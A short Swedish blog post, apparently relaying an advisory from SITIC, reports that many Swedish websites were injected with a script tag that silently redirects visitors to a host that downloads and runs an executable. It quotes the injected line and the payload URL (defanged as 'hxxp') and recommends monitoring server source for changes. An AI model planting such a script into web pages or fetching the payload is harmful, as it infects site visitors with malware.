De senaste veckorna har ett stort antal svenska hemsidor blivit infekterade med skadlig kod. Ett litet java-script har lagt till i källkoden på hemsidorna som i tysthet skickar besökaren vidare till en hemsida där skadlig kod försöker installeras på besökarens dator. Allt sker i bakgrunden så användaren ser inte att detta sker.
Detta skriver SITIC (Sveriges IT-incidentcentrum) på sin hemsida.
Koden som läggs till på hemsidan är: <script src=hxxp://www.nihaorr1.com/1.js>.
Vid lyckad exploatering laddas hxxp://www.nihaorr1.com/test.exe ned och exekveras.
Sitic rekommenderar att man kontinuerligt verifierar att källkoden på ens webbserver inte modifierats.
Genom en sökning på Google kan man få svar på hemsidor som är eller har varit infekterade.
Läs även andra bloggares åsikter om internet, säkerhet, datavirus.
Inga Kommentarer/Pingbacker på denna post ännu...
En blog som berättar sanningen, vare sig du vill höra den eller inte.
| Mån | Tis | Ons | Tor | Fre | Lör | Sön |
|---|---|---|---|---|---|---|
| << < | > >> | |||||
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | 31 | ||